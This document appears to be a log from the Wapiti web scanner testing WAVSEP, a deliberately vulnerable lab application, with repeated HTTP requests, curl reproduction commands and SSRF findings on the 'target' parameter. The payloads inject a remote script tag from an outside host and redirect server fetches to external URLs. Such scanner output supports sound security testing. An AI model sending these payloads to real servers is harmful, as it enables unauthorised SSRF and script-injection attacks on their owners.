POST /wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/Case06-Redirect-FalsePositive-RFI-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/Case06-Redirect-FalsePositive-RFI-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw3vkbrevqnz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/Case06-Redirect-FalsePositive-RFI-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/Case06-Redirect-FalsePositive-RFI-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw3vkbrevqnz.js%3E%3C%2Fscript%3E"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:25+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1438/746172676574/1527559525-174.119.60.74.txt
GET /wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/Case06-Redirect-FalsePositive-RFI-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/Case06-Redirect-FalsePositive-RFI-TextHtmlValidResponse-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:23+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1451/746172676574/1527559523-174.119.60.74.txt
GET /wavsep/active/RFI/RFI-FalsePositives-GET/Case05-RFI-FalsePositive-UrlClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-FalsePositives-GET/Case05-RFI-FalsePositive-UrlClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:40+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1854/746172676574/1527559540-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:40+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1857/746172676574/1527559540-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:40+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1860/746172676574/1527559540-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:40+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1862/746172676574/1527559540-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:35+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1865/746172676574/1527559535-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:35+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1867/746172676574/1527559535-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:35+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1868/746172676574/1527559535-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:35+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1870/746172676574/1527559535-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:37+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1874/746172676574/1527559537-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:36+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1875/746172676574/1527559536-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:37+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1877/746172676574/1527559537-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:37+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1878/746172676574/1527559537-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:38+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1881/746172676574/1527559538-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Identical/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Identical/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Identical/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Identical/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:38+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1883/746172676574/1527559538-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Identical/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Identical/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Identical/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Identical/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:38+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1886/746172676574/1527559538-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Identical/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Identical/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Identical/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Identical/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:38+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1888/746172676574/1527559538-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Identical/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Identical/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Identical/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Identical/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:35+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1893/746172676574/1527559535-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:36+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1894/746172676574/1527559536-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:35+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1897/746172676574/1527559535-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:35+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1899/746172676574/1527559535-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"
SSRF vulnerability via injection in the parameter target. The target performed an outgoing HTTP GET request at 2018-05-29T04:05:34+02:00 with IP 174.119.60.74. Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1904/746172676574/1527559534-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Identical/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"
